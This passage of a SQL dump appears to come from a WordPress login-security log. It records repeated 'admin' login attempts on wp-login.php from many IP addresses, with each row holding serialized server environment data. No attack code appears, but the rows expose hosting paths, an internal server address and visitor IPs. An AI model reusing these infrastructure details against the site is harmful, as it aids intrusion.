00:00:00'),(93895,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ro-RO,ro;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, br, zstd\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:134:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.126 Safari/537.36 Edg/113.0.1774.50\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"50278\";s:11:\"REMOTE_ADDR\";s:15:\"185.199.236.107\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745405758.7022319;s:12:\"REQUEST_TIME\";i:1745405758;}}','185.199.236.107',0,'2025-04-23 16:26:00','1970-01-01 00:00:00'),(93896,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"tr-TR,tr;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, deflate, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"103\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"60632\";s:11:\"REMOTE_ADDR\";s:12:\"67.205.6.165\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"103\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745406138.5713079;s:12:\"REQUEST_TIME\";i:1745406138;}}','67.205.6.165',0,'2025-04-23 16:32:20','1970-01-01 00:00:00'),(93897,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ko-KR,ko;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, br, zstd\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"100\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"55862\";s:11:\"REMOTE_ADDR\";s:13:\"81.177.140.54\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"100\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745406516.3233399;s:12:\"REQUEST_TIME\";i:1745406516;}}','81.177.140.54',0,'2025-04-23 16:38:37','1970-01-01 00:00:00'),(93898,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ar-SA,ar;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"103\";s:15:\"HTTP_USER_AGENT\";s:134:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36 Edg/112.0.1722.68\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"41848\";s:11:\"REMOTE_ADDR\";s:13:\"68.65.122.219\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"103\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745406892.2530029;s:12:\"REQUEST_TIME\";i:1745406892;}}','68.65.122.219',0,'2025-04-23 16:44:53','1970-01-01 00:00:00'),(93899,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"hu-HU,hu;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, deflate, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"108\";s:15:\"HTTP_USER_AGENT\";s:111:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"35916\";s:11:\"REMOTE_ADDR\";s:13:\"85.215.220.72\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"108\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745407272.26266;s:12:\"REQUEST_TIME\";i:1745407272;}}','85.215.220.72',0,'2025-04-23 16:51:13','1970-01-01 00:00:00'),(93900,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"de-DE,de;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"103\";s:15:\"HTTP_USER_AGENT\";s:111:\"Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"51014\";s:11:\"REMOTE_ADDR\";s:15:\"162.240.153.241\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"103\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745407647.2389021;s:12:\"REQUEST_TIME\";i:1745407647;}}','162.240.153.241',0,'2025-04-23 16:57:28','1970-01-01 00:00:00'),(93901,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"el-GR,el;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, br, zstd\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"103\";s:15:\"HTTP_USER_AGENT\";s:119:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 14.3) AppleWebKit/614.31.14 (KHTML, like Gecko) Version/17.0.96 Safari/614.31.14\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"40394\";s:11:\"REMOTE_ADDR\";s:13:\"195.161.69.18\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"103\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745408005.0698471;s:12:\"REQUEST_TIME\";i:1745408005;}}','195.161.69.18',0,'2025-04-23 17:03:26','1970-01-01 00:00:00'),(93902,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ko-KR,ko;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:10:\"gzip, zstd\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"107\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"54294\";s:11:\"REMOTE_ADDR\";s:14:\"195.26.245.159\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"107\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745408370.780627;s:12:\"REQUEST_TIME\";i:1745408370;}}','195.26.245.159',0,'2025-04-23 17:09:32','1970-01-01 00:00:00'),(93903,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"cs-CZ,cs;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:96:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"101\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.102 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"35108\";s:11:\"REMOTE_ADDR\";s:14:\"198.54.114.126\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"101\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745408725.598212;s:12:\"REQUEST_TIME\";i:1745408725;}}','198.54.114.126',0,'2025-04-23 17:15:27','1970-01-01 00:00:00'),(93904,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"uk-UA,uk;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, br, zstd\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"100\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"47544\";s:11:\"REMOTE_ADDR\";s:12:\"14.225.8.196\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"100\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745409082.307529;s:12:\"REQUEST_TIME\";i:1745409082;}}','14.225.8.196',0,'2025-04-23 17:21:23','1970-01-01 00:00:00'),(93905,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ja-JP,ja;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, br, zstd, deflate\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"101\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 11.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"44850\";s:11:\"REMOTE_ADDR\";s:11:\"45.67.14.64\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"101\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_AD